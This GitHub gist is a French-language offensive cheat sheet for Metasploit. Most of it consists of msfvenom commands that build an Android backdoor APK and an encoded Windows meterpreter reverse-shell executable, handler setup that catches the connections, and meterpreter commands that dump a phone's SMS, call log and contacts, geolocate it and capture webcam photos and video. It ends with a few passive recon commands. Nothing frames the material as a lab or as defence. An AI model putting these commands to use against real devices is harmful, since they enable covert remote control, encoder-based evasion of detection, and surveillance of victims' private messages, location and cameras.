Skip to content

Instantly share code, notes, and snippets.

@rzdhop
Last active March 1, 2019 12:49
Show Gist options
  • Save rzdhop/1bdfd752c0da33f276eff8630e207452 to your computer and use it in GitHub Desktop.
Save rzdhop/1bdfd752c0da33f276eff8630e207452 to your computer and use it in GitHub Desktop.
Se connecter a la database de metasploit:
> systemctl start postgresql
> msfdb init
Entrer dans le Path 'Creating configuration file'
> cd <Path>
> cat database.yml
> cp database.yml /root/.msf4/
> cd ~/.msf4/
> ls (voir database.yml dans /.msf4/)
>> IMPORTANT : apt-get update | apt-get upgrade
----------------------------------------------------------------------------------------------------
apt update && apt -y install exploitdb
searchsploit VERSION (e.g vstpd 3.0.3) ==> Check si on a un exploit pour cette version (de port) dans kaliDB Apres un nmap
----------------------------------------------------------------------------------------------------
Crée un payload et l'exploiter:
msfvenom -p <Payload | android/meterpreter/reverse_tcp lhost= <monIP> lport= <monport | 4444> >/root/desktop/Payload.apk
|msfpayload android/meterpreter/reverse_tcp lhost= <monIP> R > /root/Desktop/Backdoor.apk|
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <monIP>
set lport 4444
exploit
Commandes meterpreter:
-dump_sms = extraitre msg
-dump_calllog = historique appels
-dump_contacts = Extraire contacts
-geolocate = geolocaliser l'appareil
-check_root = check si root
-webcam_list = check les webcam
-webcam_snap <1 ou 2 etc..> = prendre une photo avec la webcam 1 ou 2 etc...4
-webcam_stream = prend une video avec la camera
- ? = lister les commandes en generale
crée un payload Windows:
msfvenom -l encoders = voir les encorder
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > Payload_Windows.exe
-a x86 = choisir l'architechture
-p windows/shell/reverse_tcp = choisir le payload
LHOST = Local host
LPORT = 4444
-b "\x00" = pour eviter les mauvais caractères
-e x86/shikata_ga_nai = pour l'encodeur
-f exe > Payload.exe = l'extension et le nom du fichier
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.48.129
set LPORT 4444
run
----------------------------------------------------------------------------------------------------
Collect information passif :
-whois (sur site = whois root-me.org) (sur IP = whois <IP>)
-netcraft search DNS (avc URL de site)
-nslookup ---> set type=mx -----> <URL>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment